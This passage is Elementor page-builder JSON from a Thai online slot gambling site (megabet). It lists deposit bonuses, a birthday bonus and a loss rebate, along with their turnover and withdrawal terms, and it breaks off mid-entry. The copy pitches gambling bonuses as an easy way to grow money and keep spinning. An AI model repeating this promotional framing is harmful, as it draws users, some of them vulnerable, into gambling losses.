\\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" 